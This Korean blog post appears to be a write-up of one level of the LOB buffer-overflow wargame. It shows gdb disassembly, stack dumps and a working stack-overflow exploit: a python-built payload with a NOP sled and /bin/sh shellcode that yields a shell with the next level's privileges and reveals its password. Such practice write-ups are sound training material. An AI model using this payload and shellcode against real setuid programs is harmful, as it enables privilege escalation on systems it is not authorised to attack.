중간에 코볼트는 어디에 적어뒀는지 기억이 나질않는다;;
[orc@localhost tmp]$ gdb -q wolfman
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>: push %ebp
0x8048501 <main+1>: mov %esp,%ebp
0x8048503 <main+3>: sub $0x2c,%esp
0x8048506 <main+6>: cmpl $0x1,0x8(%ebp)
0x804850a <main+10>: jg 0x8048523 <main+35>
0x804850c <main+12>: push $0x8048640
0x8048511 <main+17>: call 0x8048410 <printf>
0x8048516 <main+22>: add $0x4,%esp
0x8048519 <main+25>: push $0x0
0x804851b <main+27>: call 0x8048420 <exit>
0x8048520 <main+32>: add $0x4,%esp
0x8048523 <main+35>: nop
0x8048524 <main+36>: movl $0x0,0xffffffd4(%ebp)
0x804852b <main+43>: nop
0x804852c <main+44>: lea 0x0(%esi,1),%esi
0x8048530 <main+48>: mov 0xffffffd4(%ebp),%eax
0x8048533 <main+51>: lea 0x0(,%eax,4),%edx
0x804853a <main+58>: mov 0x8049760,%eax
0x804853f <main+63>: cmpl $0x0,(%eax,%edx,1)
0x8048543 <main+67>: jne 0x8048547 <main+71>
0x8048545 <main+69>: jmp 0x8048587 <main+135>
0x8048547 <main+71>: mov 0xffffffd4(%ebp),%eax
0x804854a <main+74>: lea 0x0(,%eax,4),%edx
0x8048551 <main+81>: mov 0x8049760,%eax
0x8048556 <main+86>: mov (%eax,%edx,1),%edx
0x8048559 <main+89>: push %edx
0x804855a <main+90>: call 0x80483f0 <strlen>
0x804855f <main+95>: add $0x4,%esp
0x8048562 <main+98>: mov %eax,%eax
0x8048564 <main+100>: push %eax
0x8048565 <main+101>: push $0x0
0x8048567 <main+103>: mov 0xffffffd4(%ebp),%eax
0x804856a <main+106>: lea 0x0(,%eax,4),%edx
0x8048571 <main+113>: mov 0x8049760,%eax
0x8048576 <main+118>: mov (%eax,%edx,1),%edx
0x8048579 <main+121>: push %edx
0x804857a <main+122>: call 0x8048430 <memset>
0x804857f <main+127>: add $0xc,%esp
0x8048582 <main+130>: incl 0xffffffd4(%ebp)
0x8048585 <main+133>: jmp 0x8048530 <main+48>
---Type <return> to continue, or q <return> to quit---
0x8048587 <main+135>: mov 0xc(%ebp),%eax
0x804858a <main+138>: add $0x4,%eax
0x804858d <main+141>: mov (%eax),%edx
0x804858f <main+143>: add $0x2f,%edx
0x8048592 <main+146>: cmpb $0xbf,(%edx)
0x8048595 <main+149>: je 0x80485b0 <main+176>
0x8048597 <main+151>: push $0x804864c
0x804859c <main+156>: call 0x8048410 <printf>
0x80485a1 <main+161>: add $0x4,%esp
0x80485a4 <main+164>: push $0x0
0x80485a6 <main+166>: call 0x8048420 <exit>
0x80485ab <main+171>: add $0x4,%esp
0x80485ae <main+174>: mov %esi,%esi
0x80485b0 <main+176>: mov 0xc(%ebp),%eax
0x80485b3 <main+179>: add $0x4,%eax
0x80485b6 <main+182>: mov (%eax),%edx
0x80485b8 <main+184>: push %edx
0x80485b9 <main+185>: lea 0xffffffd8(%ebp),%eax
0x80485bc <main+188>: push %eax
0x80485bd <main+189>: call 0x8048440 <strcpy>
0x80485c2 <main+194>: add $0x8,%esp
0x80485c5 <main+197>: lea 0xffffffd8(%ebp),%eax
0x80485c8 <main+200>: push %eax
0x80485c9 <main+201>: push $0x8048669
0x80485ce <main+206>: call 0x8048410 <printf>
0x80485d3 <main+211>: add $0x8,%esp
0x80485d6 <main+214>: push $0x28
0x80485d8 <main+216>: push $0x0
0x80485da <main+218>: lea 0xffffffd8(%ebp),%eax
0x80485dd <main+221>: push %eax
0x80485de <main+222>: call 0x8048430 <memset>
0x80485e3 <main+227>: add $0xc,%esp
0x80485e6 <main+230>: leave
0x80485e7 <main+231>: ret
0x80485e8 <main+232>: nop
0x80485e9 <main+233>: nop
0x80485ea <main+234>: nop
0x80485eb <main+235>: nop
0x80485ec <main+236>: nop
0x80485ed <main+237>: nop
0x80485ee <main+238>: nop
---Type <return> to continue, or q <return> to quit---
0x80485ef <main+239>: nop
End of assembler dump.
(gdb) b *main+231
Breakpoint 1 at 0x80485e7
(gdb) r `python -c 'print "\xbf"*44+"\xec\xfc\xff\xbf"'``python -c 'print "\x90
"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89
\xe1\x99\xb0\x0b\xcd\x80"'`
Starting program: /home/orc/tmp/wolfman `python -c 'print "\xbf"*44+"\xec\xfc\xf
f\xbf"'``python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x
62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
stack is still your friend.
Program exited normally.
(gdb) r `python -c 'print "\xbf"*44+"\xec\xfc\xbf\xbf"'``python -c 'print "\x90
"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89
\xe1\x99\xb0\x0b\xcd\x80"'`
Starting program: /home/orc/tmp/wolfman `python -c 'print "\xbf"*44+"\xec\xfc\xb
f\xbf"'``python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x
62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜賃옜릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱1픐h//shh/bin됥PS됣솻
?
Breakpoint 1, 0x80485e7 in main ()
(gdb) x/200x $esp-100
0xbffffaf8: 0xfffffe75 0x4005d920 0x400143e0 0xbffffb1c
0xbffffb08: 0x40066070 0x40106980 0x4000ae60 0xbffffba4
0xbffffb18: 0xbffffb58 0x080485e3 0xbffffb30 0x00000000
0xbffffb28: 0x00000028 0x00000016 0x00000000 0x00000000
0xbffffb38: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb48: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb58: 0xbfbfbfbf 0xbfbffcec 0x90909090 0x90909090
0xbffffb68: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb78: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb88: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb98: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffba8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbb8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbc8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbd8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbe8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbf8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc08: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc18: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc28: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc38: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc48: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc58: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc68: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc78: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc88: 0x90909090 0x6850c031 0x68732f2f 0x69622f68
0xbffffc98: 0x50e3896e 0x99e18953 0x80cd0bb0 0x6d6f6800
0xbffffca8: 0x726f2f65 0x6d742f63 0x6f772f70 0x616d666c
0xbffffcb8: 0xbfbf006e 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffcc8: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffcd8: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xfcecbfbf
0xbffffce8: 0x9090bfbf 0x90909090 0x90909090 0x90909090
0xbffffcf8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd08: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd18: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd28: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd38: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd48: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd58: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd68: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd78: 0x90909090 0x90909090 0x90909090 0x90909090
---Type <return> to continue, or q <return> to quit---
0xbffffd88: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd98: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffda8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdb8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdc8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdd8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffde8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdf8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe08: 0x90909090 0x90909090 0x90909090 0xc0319090
(gdb)
(gdb) x/200x $esp
0xbffffb5c: 0xbfbffcec 0x90909090 0x90909090 0x90909090
0xbffffb6c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb7c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb8c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb9c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbac: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbbc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbcc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbdc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbec: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbfc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc0c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc1c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc2c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc3c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc4c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc5c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc6c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc7c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc8c: 0x6850c031 0x68732f2f 0x69622f68 0x50e3896e
0xbffffc9c: 0x99e18953 0x80cd0bb0 0x6d6f6800 0x726f2f65
0xbffffcac: 0x6d742f63 0x6f772f70 0x616d666c 0xbfbf006e
0xbffffcbc: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffccc: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffcdc: 0xbfbfbfbf 0xbfbfbfbf 0xfcecbfbf 0x9090bfbf
0xbffffcec: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffcfc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd0c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd1c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd2c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd3c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd4c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd5c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd6c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd7c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd8c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd9c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdac: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdbc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdcc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffddc: 0x90909090 0x90909090 0x90909090 0x90909090
---Type <return> to continue, or q <return> to quit---
0xbffffdec: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdfc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe0c: 0x90909090 0x90909090 0xc0319090 0x2f2f6850
0xbffffe1c: 0x2f686873 0x896e6962 0x895350e3 0x0bb099e1
0xbffffe2c: 0x000080cd 0x00000000 0x00000000 0x00000000
0xbffffe3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe4c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe6c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) q
The program is running. Exit anyway? (y or n) y
[orc@localhost tmp]$ ./wolfman `python -c 'print "\xbf"*44+"\xec\xfd\xff\xbf"'`
`python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\
x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜入?릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?/div>
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱?픐h//shh/bin됥PS됣솻
?
bash$ id
uid=504(orc) gid=504(orc) groups=504(orc)
bash$ q
sh: q: command not found
bash$ exit
exit
[orc@localhost tmp]$ ls
core wolfman
[orc@localhost tmp]$ rm core
[orc@localhost tmp]$ cd ../
[orc@localhost orc]$ ./wolfman `python -c 'print "\xbf"*44+"\xec\xfd\xff\xbf"'`
`python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\
x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜入?릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?/div>
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱?픐h//shh/bin됥PS됣솻
?
bash$ id
uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc)
bash$ my-pass
euid = 505
love eyuna
bash$
'Wargame > LOB (Redhat9)' 카테고리의 다른 글
| orge -> troll (0) | 2014.02.20 |
|---|---|
| darkelf->orge (0) | 2014.02.20 |
| wolfman -> darkelf (0) | 2014.02.20 |
| gremlin -> cobolt (0) | 2014.02.20 |
| gate -> gremlin (0) | 2014.02.20 |
